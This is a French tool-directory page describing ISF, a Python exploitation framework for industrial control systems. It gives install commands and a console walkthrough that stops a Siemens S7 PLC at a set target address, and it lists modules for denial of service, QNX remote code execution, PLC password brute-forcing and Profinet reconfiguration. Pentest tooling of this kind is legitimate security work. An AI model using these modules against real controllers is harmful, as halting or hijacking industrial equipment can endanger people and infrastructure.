Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
isf — ISF(Industrial Control System Exploitation Framework),a exploitation framework based on Python | Kitploit
Outils/GitHubGitHub/dark-lbp/isf
Penetration Testing FrameworksExploit FrameworksNetwork MappingVulnerability AnalysisExploitationSCADA/ICS SecurityInformation GatheringFuzzingPayload DevelopmentArchived
GitHubdark-lbp/isf

isf

1.1k301il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ISF(Industrial Control System Exploitation Framework),a exploitation framework based on Python

Voir le dépôt

Cadre d'exploitation industrielle

ISF (Industrial Exploitation Framework) est un cadre d'exploitation basé sur Python, similaire au framework metasploit.

ISF est basé sur le projet open source routersploit.

Lire ceci dans d'autres langues : English, 简体中文,

Avertissement

L'utilisation d'ISF pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou dommage causé par ce programme.

Clients de protocole ICS

NomCheminDescription
modbus_tcp_clienticssploit/clients/modbus_tcp_client.pyClient Modbus-TCP
wdb2_clienticssploit/clients/wdb2_client.pyClient WdbRPC Version 2 (Vxworks 6.x)
s7_clienticssploit/clients/s7_client.pyClient s7comm (API S7 300/400)

Module d'exploitation

Module de scanneur

Module de protocoles ICS (Module Scapy)

Ces protocoles peuvent être utilisés dans d'autres cadres de fuzzing comme Kitty ou pour créer votre propre client.

Installation

Dépendances Python

  • gnureadline (OSX uniquement)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp
  • python-nmap
  • scapy Nous suggérons d'installer scapy manuellement avec ce document officiel

Installation sur Kali

root@kitploit:~
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Utilisation

root@kitploit:~
    root@kali:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     \___ \\___ \|  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|
    
    
                    Cadre d'exploitation ICS
    
    Note     : ICSSPOLIT est un fork de routersploit à
               https://github.com/reverse-shell/routersploit
    Équipe Dev : wenzhe zhu(dark-lbp)
    Version  : 0.1.0
    
    Exploits : 2 Scanneurs : 0 Identifiants : 13
    
    Exploits ICS :
        API : 2           Commutateur ICS : 0
        Logiciel : 0
    
    isf >

Exploits

root@kitploit:~
isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (Contrôle API S7-300/400) >

Vous pouvez utiliser la touche de tabulation pour la complétion.

Options

Afficher les options du module :

root@kitploit:~
isf (Contrôle API S7-300/400) > show options

Options de la cible :

   Nom          Paramètres actuels     Description
   ----         ----------------     -----------
   target                            Adresse cible p. ex. 192.168.1.1
   port         102                  Port cible


Options du module :

   Nom          Paramètres actuels     Description
   ----         ----------------     -----------
   slot         2                    Numéro d'emplacement CPU.
   command      1                    Commande 0 : démarrer API, 1 : arrêter API.


isf (Contrôle API S7-300/400) >

Définir les options

root@kitploit:~
isf (Contrôle API S7-300/400) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

Exécuter le module

root@kitploit:~
isf (Contrôle API S7-300/400) > run
[*] Exécution du module...
[+] La cible est active
[*] Envoi du paquet à la cible
[*] Arrêt API
isf (Contrôle API S7-300/400) >

Afficher les informations sur l'exploit

root@kitploit:~
isf (Contrôle API S7-300/400) > show info

Nom :
Contrôle API S7-300/400

Description :
Utiliser la commande S7comm pour démarrer/arrêter l'API.

Appareils :
-  Automates programmables Siemens S7-300 et S7-400 (API)

Auteurs :
-  wenzhe zhu <jtrkid[at]gmail.com>

Références :

isf (Contrôle API S7-300/400) >

Documents

  • Utilisation du client Modbus-TCP
  • Utilisation du client WDBRPCV2
  • Utilisation du client S7comm
  • Utilisation de SNMP_bruteforce
  • Utilisation du bruteforce mot de passe API S7 300/400
  • Utilisation du scanneur Vxworks 6.x
  • Utilisation du scanneur Profinet DCP
  • Utilisation du scanneur API S7comm
  • Utilisation du module de configuration IP Profinet DCP
  • Charger des modules depuis un dossier supplémentaire
  • Comment écrire votre propre module
Télécharger l’outil
NomCheminDescription
s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_control.pyDémarrage/arrêt API S7-300/400 PLC
s7_1200_plc_controlexploits/plcs/siemens/s7_1200_plc_control.pyDémarrage/arrêt/réinitialisation API S7-1200 PLC
vxworks_rpc_dosexploits/plcs/vxworks/vxworks_rpc_dos.pyDéni de service distant Vxworks RPC (CVE-2015-7599)
quantum_140_plc_controlexploits/plcs/schneider/quantum_140_plc_control.pyDémarrage/arrêt API Schneider Quantum 140 série
crash_qnx_inetd_tcp_serviceexploits/plcs/qnx/crash_qnx_inetd_tcp_service.pyDéni de service service TCP QNX Inetd
qconn_remote_execexploits/plcs/qnx/qconn_remote_exec.pyExécution de code à distance QNX qconn
profinet_set_ipexploits/plcs/siemens/profinet_set_ip.pyConfiguration IP du périphérique Profinet DCP
NomCheminDescription
profinet_dcp_scanscanners/profinet_dcp_scan.pyScanneur Profinet DCP
vxworks_6_scanscanners/vxworks_6_scan.pyScanneur Vxworks 6.x
s7comm_scanscanners/s7comm_scan.pyScanneur S7comm
enip_scanscanners/enip_scan.pyScanneur EthernetIP
NomCheminDescription
pn_dcpicssploit/protocols/pn_dcpProtocole Profinet DCP
modbus_tcpicssploit/protocols/modbus_tcpProtocole Modbus TCP
wdbrpc2icssploit/protocols/wdbrpc2Protocole WDB RPC Version 2
s7commicssploit/protocols/s7comm.pyProtocole S7comm